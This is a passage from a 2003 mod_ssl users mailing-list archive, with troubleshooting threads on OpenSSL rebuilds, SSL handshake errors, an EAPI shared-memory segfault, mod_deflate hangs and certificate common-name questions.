bnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMIHjBgsqhkiG9w0BCRACCzGB06CB0DCBvDELMAkG
A1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoT
MVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAg
BgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRp
ZmljYXRlQHRydXN0Y2VudGVyLmRlAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcNAQEBBQAE
ggEAMAcpfkaohEb6kzhMOVr5VkeIJBliTZg/PhO2k4v0KhzgGSS3/bv3LsbEMoSQVjl3+CzB
iDmelNVTxIkSpe2nzjw20tswi+e7qHhqjxMhjTxvKF5slt5AZzkFMx1Wzro3g5FLDRUO+hia
7pqDo9IX1R2uHzhpXCG0A0ieLnjFgUAco8pPhtMQ9ZFiwHxd4ebjOSY9VOh1nIY8FIqgwzJk
oFfBysUlE8X+V9mUuTaDAzUDEpdlAjUBexMwmnuI+seBDA4pi6UOIkSB98xfqxlj8FuoVZsN
vr0h0gGFTpusQULGWIhYde10F9H9JItoj382jnY7+Viez4mgpCXEk+0XgAAAAAAAAA==
--------------ms070309030200030306040900--


From owner-modssl-users@modssl.org  Mon Apr 28 21:15:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C73722AA02A; Mon, 28 Apr 2003 21:15:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from techno.sub.ru (webmail.sub.ru [213.247.139.22])
	by master.modssl.org (Postfix) with SMTP id 15E592AA01A
	for ; Mon, 28 Apr 2003 21:15:16 +0200 (CEST)
Received: (qmail 89048 invoked by uid 0); 28 Apr 2003 19:14:42 -0000
Received: from unknown (HELO tarkhil.over.ru) (217.150.60.67)
  by webmail.sub.ru with SMTP; 28 Apr 2003 19:14:42 -0000
Date: Mon, 28 Apr 2003 23:09:59 +0400
From: Alex Povolotsky 
To: modssl-users@modssl.org
Subject: Rebuilded openssl on FreeBSD, apache+modssl ceased to work
Message-Id: <20030428230959.4a031ec6.tarkhil@webmail.sub.ru>
Organization: sub.ru
X-Mailer: Sylpheed version 0.8.10claws (GTK+ 1.2.10; i386-portbld-freebsd4.6)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Povolotsky 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello!

I've updated openssl to 0.9.7a on FreeBSD 4.5-RELEASE, and apache+mod_ssl ceased to work.

I've made sure that only one version of libssl exists in system, and recompiled apache.

Without any apparent error, lynx fails saying

Looking up techno.sub.ru
Making HTTPS connection to techno.sub.ru
Secure 168-bit TLSv1/SSLv3 (EDH-RSA-DES-CBC3-SHA) HTTP connection
Sending HTTP request.
HTTP request sent; waiting for response.
Alert!: Unexpected network read error; connection aborted.
Can't Access `https://techno.sub.ru/cgi-bin/client'
Alert!: Unable to access document.

The same does curl:

-curl: (56) SSL read error: 1


Here is what I have in ssl_engine_log:

[28/Apr/2003 23:13:55 75194] [error] SSL error on reading data (OpenSSL library error follows)
[28/Apr/2003 23:13:55 75194] [error] OpenSSL: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number


What library could I miss? Or maybe it's something in header? 

- 
Alex.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 28 21:37:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B6FB82AA032; Mon, 28 Apr 2003 21:37:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id D948F2AA01A
	for ; Mon, 28 Apr 2003 21:36:55 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA12021;
	Mon, 28 Apr 2003 14:34:33 -0400
Date: Mon, 28 Apr 2003 14:34:33 -0400 (EDT)
From: "R. DuFresne" 
To: Alex Povolotsky 
Cc: modssl-users@modssl.org
Subject: Re: Rebuilded openssl on FreeBSD, apache+modssl ceased to work
In-Reply-To: <20030428230959.4a031ec6.tarkhil@webmail.sub.ru>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


You have to rebuild apache after you do openssl, afterall, part of
apache's config process prior to the gawdalmighty make is dependent upon
the config of openssl, at least when one enables mod-ssl...

So, you are partway there, and depending upon what version of apache
<1.3.x or 2.0.x> you will need to redo yer config setup for modssl as
well.

Thanks,

Ron DuFresne

On Mon, 28 Apr 2003, Alex Povolotsky wrote:

> Hello!
> 
> I've updated openssl to 0.9.7a on FreeBSD 4.5-RELEASE, and apache+mod_ssl ceased to work.
> 
> I've made sure that only one version of libssl exists in system, and recompiled apache.
> 
> Without any apparent error, lynx fails saying
> 
> Looking up techno.sub.ru
> Making HTTPS connection to techno.sub.ru
> Secure 168-bit TLSv1/SSLv3 (EDH-RSA-DES-CBC3-SHA) HTTP connection
> Sending HTTP request.
> HTTP request sent; waiting for response.
> Alert!: Unexpected network read error; connection aborted.
> Can't Access `https://techno.sub.ru/cgi-bin/client'
> Alert!: Unable to access document.
> 
> The same does curl:
> 
> -curl: (56) SSL read error: 1
> 
> 
> Here is what I have in ssl_engine_log:
> 
> [28/Apr/2003 23:13:55 75194] [error] SSL error on reading data (OpenSSL library error follows)
> [28/Apr/2003 23:13:55 75194] [error] OpenSSL: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number
> 
> 
> What library could I miss? Or maybe it's something in header? 
> 
> - 
> Alex.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 29 12:19:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8121B2AA02A; Tue, 29 Apr 2003 12:19:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cvo-exchange.cvo.roguewave.com (cvo-ext.roguewave.com [12.22.36.198])
	by master.modssl.org (Postfix) with ESMTP id 7A2822AA015
	for ; Tue, 29 Apr 2003 12:19:41 +0200 (CEST)
Received: by cvo-exchange.cvo.roguewave.com with Internet Mail Service (5.5.2655.55)
	id ; Tue, 29 Apr 2003 03:19:23 -0700
Message-ID: 
From: Edin Zulic 
To: "'modssl-users@modssl.org'" 
Subject: httpd binary has a dependency on libssl.so 
Date: Tue, 29 Apr 2003 03:19:15 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Edin Zulic 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I've built Apache 2.0.45 with mod_ssl DSO and OpenSSL 0.9.7a on Linux,
Solaris, HP-UX, and AIX. On all those platforms I notice that the httpd
binary has a dependency on libssl.so, which is a bit of a surprise, since
it's mod_ssl that should have that dependency, not the Apache executable
itself. This means that even when mod_ssl is not loaded, is loaded anyway.
Is this really the case, or am I missing something?

My builds of Apache were usually configured something like:

CC="my_cc" CFLAGS="my flags" ./configure --prefix=my/install/dir
--enable-ssl=shared --with-mpm=worker

Thanks!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  1 18:37:15 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E4FCB2AA035; Thu,  1 May 2003 18:37:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from park.rambler.ru (park.rambler.ru [81.19.64.101])
	by master.modssl.org (Postfix) with ESMTP id 16CC32AA020
	for ; Thu,  1 May 2003 18:37:14 +0200 (CEST)
Received: from is.park.rambler.ru (is.park.rambler.ru [81.19.64.102])
	by park.rambler.ru (8.12.6/8.12.6) with ESMTP id h41GbCmF044664
	for ; Thu, 1 May 2003 20:37:12 +0400 (MSD)
Date: Thu, 1 May 2003 20:37:12 +0400 (MSD)
From: Igor Sysoev 
X-Sender: is@is
To: modssl-users@modssl.org
Subject: Segmentation fault
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Igor Sysoev 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It's seems that EAPI 2.8.13-1.3.27's fix:

   *) Correctly shutdown shared memory pools on fork+exec situations.

causes a segmentation fault on Apache's startup if error log is piped.

To reproduce the fault set the directive

ErrorLog "|cat>/tmp/error_log"

and use some module that creates the shared pool and allocates a memory
from it on the init module phase.


Igor Sysoev
http://sysoev.ru/en/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  1 19:42:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1FC352AA035; Thu,  1 May 2003 19:42:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from park.rambler.ru (park.rambler.ru [81.19.64.101])
	by master.modssl.org (Postfix) with ESMTP id 3E1702AA020
	for ; Thu,  1 May 2003 19:42:47 +0200 (CEST)
Received: from is.park.rambler.ru (is.park.rambler.ru [81.19.64.102])
	by park.rambler.ru (8.12.6/8.12.6) with ESMTP id h41HgYmF045549
	for ; Thu, 1 May 2003 21:42:34 +0400 (MSD)
Date: Thu, 1 May 2003 21:42:34 +0400 (MSD)
From: Igor Sysoev 
X-Sender: is@is
To: modssl-users@modssl.org
Subject: Segmentation fault
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Igor Sysoev 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I think that ap_cleanup_for_exec() should not call ap_kill_alloc_shared()
but instead should call some munmap()/shmclt(IPC_RMID)/etc wrapper without
a freeing the allocated blocks in pool - these blocks still in use by other
processes.


Igor Sysoev
http://sysoev.ru/en/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  1 20:31:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5AE972AA035; Thu,  1 May 2003 20:31:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from park.rambler.ru (park.rambler.ru [81.19.64.101])
	by master.modssl.org (Postfix) with ESMTP id 922432AA020
	for ; Thu,  1 May 2003 20:31:19 +0200 (CEST)
Received: from is.park.rambler.ru (is.park.rambler.ru [81.19.64.102])
	by park.rambler.ru (8.12.6/8.12.6) with ESMTP id h41IVGmF046288
	for ; Thu, 1 May 2003 22:31:16 +0400 (MSD)
Date: Thu, 1 May 2003 22:31:16 +0400 (MSD)
From: Igor Sysoev 
X-Sender: is@is
To: modssl-users@modssl.org
Subject: Re: Segmentation fault
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Igor Sysoev 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 1 May 2003, Igor Sysoev wrote:

> I think that ap_cleanup_for_exec() should not call ap_kill_alloc_shared()
> but instead should call some munmap()/shmclt(IPC_RMID)/etc wrapper without
> a freeing the allocated blocks in pool - these blocks still in use by other
> processes.

Well, ap_kill_alloc_shared() does not free allocated blocks but it calls
mm_destroy() that wipes out shared memory with zeros before munmap()/etc
while other processes still think that this memory is valid.

But I still can not understand why this fix was made at all.
SysV shared segments and mmap()ed memory are not inherited across exec.


Igor Sysoev
http://sysoev.ru/en/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  2 11:29:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DC4AD2AA030; Fri,  2 May 2003 11:29:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from euhemsmtp01.bp.com (euhemsmtp01.bp.com [62.189.94.209])
	by master.modssl.org (Postfix) with ESMTP id CD0082AA01A
	for ; Fri,  2 May 2003 11:29:39 +0200 (CEST)
Received: from euhemav002.bp.com (inetgate21.bp.com [62.189.94.193])
	by euhemsmtp01.bp.com (Switch-3.0.4/Switch-3.0.0) with SMTP id h429XQta021601
	for ; Fri, 2 May 2003 10:33:26 +0100 (BST)
content-class: urn:content-classes:message
Subject: mod_deflate
Date: Fri, 2 May 2003 10:28:26 +0100
Message-ID: <2FE5DE0B8790D411832700508BAF485906D7BA46@eumorx5.bp.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Thread-Topic: mod_deflate
Thread-Index: AcMQjT+0eB/MzGRoQFCtasKGI7jN5w==
From: "Witham, Darren (Contractor)" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Witham, Darren (Contractor)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,


   I recently tried to incorporate mod_deflate into my Apache 2.0.44 =
server running on Windows so that everything other than images was =
compressed on output. Under my configuration mod_deflate and SSL seem to =
work fine independently but when used together I get odd behaviour =
whereby some pages of my app freeze. It is not a case of nothing works =
at all - just what would appear to be random hanging.

  Is there anything noteable I may have missed when setting this up or =
any known issues ?

Thx
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  5 14:47:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 74FDA2AA026; Mon,  5 May 2003 14:47:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta2.adelphia.net (mta2-0.mail.adelphia.net [64.8.50.178])
	by master.modssl.org (Postfix) with ESMTP id AB2052AA015
	for ; Mon,  5 May 2003 14:47:01 +0200 (CEST)
Received: from RBielecki ([24.51.33.85]) by mta2.adelphia.net
          (InterMail vM.5.01.05.32 201-253-122-126-132-20030307) with SMTP
          id <20030505124658.EFZT24562.mta2.adelphia.net@RBielecki>
          for ; Mon, 5 May 2003 08:46:58 -0400
Message-ID: <2a1a01c31304$6bfa5270$6601a8c0@RBielecki>
From: "Robert Bielecki" 
To: 
Subject: SSL Errors
Date: Mon, 5 May 2003 08:47:00 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_2A17_01C312E2.E4CE73B0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Robert Bielecki" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_2A17_01C312E2.E4CE73B0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello,

I'm seeing many mod_ssl / open_ssl errors in our error logs.

Running RH linux 7.2
Apache version 1.3.27=20

curl-ssl-7.9.6-1
openssl-devel-0.9.6e-3
docbook-style-dsssl-1.64-3
curl-ssl-devel-7.9.6-1
openssl-0.9.6e-3
mod_ssl-2.8.11-1

The majority of the errors look like this:

[Sun May  4 10:57:13 2003] [error] mod_ssl: SSL handshake failed (server =
airportparkingreservations.com:443, client 209.214.6.119) (OpenSSL =
library error follows)
[Sun May  4 10:57:13 2003] [error] OpenSSL: =
error:140EC0AF:lib(20):func(236):reason(175)

or (fewer)

[Sun May  4 10:56:32 2003] [error] mod_ssl: SSL handshake interrupted by =
system [Hint: Stop button pressed in browser?!] (System error follows)
[Sun May  4 10:56:32 2003] [error] System: Connection reset by peer =
(errno: 104)

Some customers report receiving a page not found error when navigating =
from http to https.

Any assistance would be greatly appreciated.

thanks,
bob

------=_NextPart_000_2A17_01C312E2.E4CE73B0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello,


 


I'm seeing =
many mod_ssl / open_ssl=20
errors in our error logs.


 


Running RH linux 7.2


Apache version 1.3.27 


 


curl-ssl-7.9.6-1
openssl-devel-0.9.6e-3
docbook-style-dsss=
l-1.64-3
curl-ssl-devel-7.9.6-1
openssl-0.9.6e-3
mod_ssl-2.8.11-=
1


The majority of the errors look like=20
this:


 


[Sun May  4 10:57:13 2003] [error] =
mod_ssl:=20
SSL handshake failed (server airportparkingreservations.com:443, client=20
209.214.6.119) (OpenSSL library error follows)
[Sun May  4 =
10:57:13=20
2003] [error] OpenSSL: =
error:140EC0AF:lib(20):func(236):reason(175)


 


or (fewer)


 


[Sun May  4 10:56:32 2003] [error] =
mod_ssl:=20
SSL handshake interrupted by system [Hint: Stop button pressed in =
browser?!]=20
(System error follows)
[Sun May  4 10:56:32 2003] [error] =
System:=20
Connection reset by peer (errno: 104)


 


Some customers report receiving a page =
not found=20
error when navigating from http to https.


 


Any assistance would be greatly=20
appreciated.


 


thanks,


bob


 


------=_NextPart_000_2A17_01C312E2.E4CE73B0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  6 08:56:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6D1092AA026; Tue,  6 May 2003 08:56:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx02.blue.aol.de (mx02.blue.aol.de [193.189.233.42])
	by master.modssl.org (Postfix) with ESMTP id 06BC32AA021
	for ; Tue,  6 May 2003 08:56:32 +0200 (CEST)
Received: from mxs602 (Mailsystem AOL Germany)
	by mx02.blue.aol.de (Mailsystem AOL Germany) with ESMTP id 825245871
	for ; Tue,  6 May 2003 08:56:29 +0200 (MEST)
Received: by decks.office.aol.de (Postfix, from userid 500)
	id A3AE3A525E; Tue,  6 May 2003 08:55:23 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by decks.office.aol.de (Postfix) with ESMTP id 6C20952D1E
	for ; Tue,  6 May 2003 08:55:23 +0200 (CEST)
Date: Tue, 6 May 2003 08:55:23 +0200 (CEST)
From: Martin Decker 
X-X-Sender: mdecker77@decks.office.aol.de
To: modssl-users@modssl.org
Subject: httpd child loop with mod_ssl 2.8.14, apache1.3.27, mod_jrun
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Decker 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello,

I have a httpd process looping after a couple of hours. Restarting
resolves the issue. The child process takes all the available CPU.

I am using:

- Solaris 8 (108528-17)
- apache 1.3.27 with mod_ssl 2.8.14, openssl 0.9.6g
- JRun 4 Service Pack 1a

What can I do to resolve this problem? I tried out the same thing on a
Apache without mod_ssl, and in that environment the process does
not loop.

Attaching gdb to the looping process reveals this:

#0  0xfeffa1b8 in startSync () from /export/home/jrun4/lib/wsconfig/2/mod_jrun.so
#1  0xfeff6ca4 in proxyRelease () from /export/home/jrun4/lib/wsconfig/2/mod_jrun.so
#2  0xfeff8218 in mappingsTableDelete () from /export/home/jrun4/lib/wsconfig/2/mod_jrun.so
#3  0xfeff3120 in jrun_child_exit () from /export/home/jrun4/lib/wsconfig/2/mod_jrun.so
#4  0xff2ccd18 in ap_child_exit_modules () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#5  0xff2d3284 in clean_child_exit () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#6  0xff2d5580 in just_die () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#7  0xff2d55bc in usr1_handler () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#8  0xff05b82c in __sighndlr () from /lib/libthread.so.1
#9  
#10 0xff11bac8 in _private_fcntl () from /lib/libc.so.1
#11 0xff116074 in s_fcntl () from /lib/libc.so.1
#12 0xff05a860 in _fcntl_cancel () from /lib/libthread.so.1
#13 0xff2d6e04 in child_main () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#14 0xff2d7644 in make_child () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#15 0xff2d7a08 in perform_idle_server_maintenance ()   from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#16 0xff2d8190 in standalone_main () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#17 0xff2d8900 in ap_main () from /usr/local/apache_omt_ssl/libexec/libhttpd.so
#18 0x1d3e4 in ?? ()

Thanks in advance,

Martin

############################################
# Martin Decker, Systems Engineer
# AOL Deutschland GmbH & Co. KG
# Millerntorplatz 1, 20359 Hamburg
# Mail: mdecker77@germany.aol.com
# AIM: mdecker77
# Tel 040/36159-7472
# Fax 040/36159-7460
#############################################


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  7 20:39:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2AF572AA031; Wed,  7 May 2003 20:39:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from servidor1.isabeldeespana.org (213-96-176-246.uc.nombres.ttd.es [213.96.176.246])
	by master.modssl.org (Postfix) with SMTP id B86FC2AA015
	for ; Wed,  7 May 2003 20:39:54 +0200 (CEST)
Received: (qmail 21589 invoked by uid 1053); 7 May 2003 18:39:52 -0000
Message-ID: <20030507183952.21588.qmail@servidor1.isabeldeespana.org>
From: modssl@isabeldeespana.org
To: modssl-users@modssl.org
Subject: doubts with ssl
Date: Wed, 07 May 2003 19:39:52 +0100
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@isabeldeespana.org
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have some doubts with ssl protocol. Actually We have apache-modssl with a 
test certificate. Now we would like one signed by a Certification Authority. 
First doubt is about Private Ip, we have only a Public Ip which is in a 
firewall and most of request ( http, https, ftp etc) are redirected to 
internal servers. Internal servers have only Private Ip. 

So my first question is, Could ssl works on a private IP? 

The second is about fqdn. Webserver has "servidorweb" as host name, and 
"servidorweb.mydomain.com" as fully qualified domain name. Anyway we have 
configured our dns to match www.mydomain.com with webserver´s IP. 

Second question is, Is necesary to change the host name of webserver from 
servidorweb to www? 


Thanks in advance. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  8 09:07:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EDA2B2AA031; Thu,  8 May 2003 09:07:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 8F11A2AA019
	for ; Thu,  8 May 2003 09:07:28 +0200 (CEST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.9/8.12.6) with ESMTP id h4877Osb010392
	for ; Thu, 8 May 2003 09:07:25 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.9/8.12.6) with ESMTP id h4877OkO020310
	for ; Thu, 8 May 2003 09:07:24 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: doubts with ssl
Date: Thu, 8 May 2003 09:07:23 +0200
Message-ID: 
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: doubts with ssl
thread-index: AcMUyDuRJWsBHmxoSUSHGj4cloqz8wAZengg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: modssl@isabeldeespana.org [mailto:modssl@isabeldeespana.org]
>
>First doubt is about Private Ip, we have only a Public Ip=20
>which is in a firewall and most of request ( http, https, ftp etc) are
redirected to=20
>internal servers. Internal servers have only Private Ip.=20
>
>So my first question is, Could ssl works on a private IP?

The firewall is not a problem - you only have to ensure that it is open
on port 443. The FW works at the TCP/IP layer and simply routes the
packets between the client and the server. If it also does Network
Address Translation (changing the IP address from public to private)
then that is not a problem either since this is an attribute of the
TCP/IP packet. The encryption is all at the HTTP layer which is *inside*
the TCP/IP packet.

Does the inside of the FW connect directly to the SSL-server? If so, no
problem. If it goes through a proxy, you need to ensure that the proxy
understands the CONNECT method. This means that the proxy will pass
packets blindly without trying to read them.

Just to be clear; SSL doesn't care about IP addresses - the
authentication phase is based on comparing the hostname in the request
with the common name in the certificate - read on...

>The second is about fqdn. Webserver has "servidorweb" as host=20
>name, and "servidorweb.mydomain.com" as fully qualified domain name.=20
>Anyway we have configured our dns to match www.mydomain.com with
webserver=B4s IP.=20
>
>Second question is, Is necesary to change the host name of=20
>webserver from servidorweb to www?=20

The way it works is that when you buy the certificate, you define a
"common-name". This is like "www.myserver.com". When a user wants to
visit your site, he types in "www.myserver.com" into his browser. The
browser then requests the site and gets back the certificate. The
browser checks that the common-name in the cert matches the fqdn that
the user typed in. If yes, all is well and the SSL connection is
established. If not, the browser alerts the user because there is now a
possibility that the site is a fake since certificate doesn't match the
fqdn. This is the *authentication* phase of SSL (which is just as
important as the encryption phase).

To answer your question, you can use any name you like in the
certificate (i.e. the common-name) but you must make sure that the
browsercomes to your site with that name. This can be a problem if you
have a lot of aliases for the site (.net, .org etc.). You used to be
able to get wildcard certs but I don't know what the current status is
